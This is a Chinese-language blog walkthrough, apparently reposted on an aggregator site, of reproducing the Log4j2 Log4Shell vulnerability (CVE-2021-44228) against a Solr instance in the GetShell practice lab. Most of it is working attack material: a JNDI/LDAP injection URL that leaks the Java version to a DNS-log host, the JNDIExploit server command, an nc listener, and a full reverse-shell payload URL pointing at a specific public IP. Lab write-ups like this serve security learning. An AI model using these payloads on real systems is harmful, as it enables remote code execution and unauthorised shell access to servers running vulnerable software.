当前位置: 首页 > news >正文

Log4j2 CVE-2021-44228 漏洞复现

环境搭建

直接使用极核GetShell靶场
https://hackhub.get-shell.com/
image

靶场
image

Solar系统存在漏洞路径可以传参

http://domain/solr/admin/cores?action=
${jndi:ldap://${sys:java.version}.example.com}

这里将domain和dns替换上去

http://node.hackhub.get-shell.com:56625/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.uzxnhvbvx0qf9z7jf6ng8sld64cw0poe.oastify.com}

看到版本已经被带出,证明存在漏洞
image

image

漏洞利用
利用JNDI注入工具:JNDIExploit 进行注入,在一个拥有公网IP的服务器上运行此工具(建议使用JDK8),命令:java -jar JNDIExploit-1.3-SNAPSHOT.jar -i <出口IP>
使用NC开启监听12345端口

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i -u
nc -lvvp 12345

image
image

利用JNDI注入工具的反弹Shell功能,访问URL

http://domian/solr/admin/cores?action=${jndi:ldap://<JNDI服务端IP>:1389/Basic/ReverseShell/<nc监听的IP>/<nc监听的端口>}

替换成我对的payload

http://node.hackhub.get-shell.com:56625/solr/admin/cores?action=${jndi:ldap://120.48.99.160:1389/Basic/ReverseShell/120.48.99.160/12345}

成功反弹shell
image

如果用vps的话,记得放开安全组,我这里做了两遍,一开始做的有问题,后来才想起来安全组没放

http://www.agseo.cn/news/130/

相关文章:

  • AI Compass前沿速览:字节Seedream4.0、Qwen3-Max、EmbeddingGemma、OneCAT多模态、rStar2-Agent
  • 使用DeepState进行API模糊测试的技术解析(第二部分)
  • TeX 的 ctex 宏包的基本用法
  • 原子操作并不能保证数值的准确与一致性
  • Linux 进程管理之软硬限制以及企业应用实践
  • mybatis-plus引入
  • 79、制作表头不能用合并后居中
  • 智能血压计芯片解决方案AI版
  • 408 Request Timeout:请求超时,服务器等待客户端发送请求的时间过长。
  • 01bfs 对 dij最短路的优化,以及一些易错点
  • MySQL约束
  • 数据结构与算法-21.堆-排序
  • Avalonia 学习笔记01. Images Buttons(图片与按钮) (转载)
  • 【触想智能】工控一体机和PLC一体机的区别你知道吗?
  • JDK 24.0.1 下载安装教程与环境配置教程(Windows10/11超详细图文安装步骤)
  • XeLaTeX 介绍
  • PTA
  • 学习笔记-安全概述
  • Adobe Animate CC2018安装包下载与安装教程
  • AE苹果手机iPhone 17展示动画片头模板 App Promo Phone 17 Pro
  • 完整教程:以数据与自动化驱动实验室变革:智能化管理整体规划
  • Windows11新系统激活设置PIN码步骤转圈
  • 82、制作座位表
  • 工业硅2511
  • 人工智能时代的合规性:为什么强大的 CI/CD 基础很重要
  • 如何优雅地清理Hugging Face缓存到本地的模型文件(2025最新版)
  • Linux 进程上下文切换详解
  • 第十天 C#学习事件 021
  • 事半功倍是蠢蛋52 使用docker-compose.override.yml
  • Elasticsearch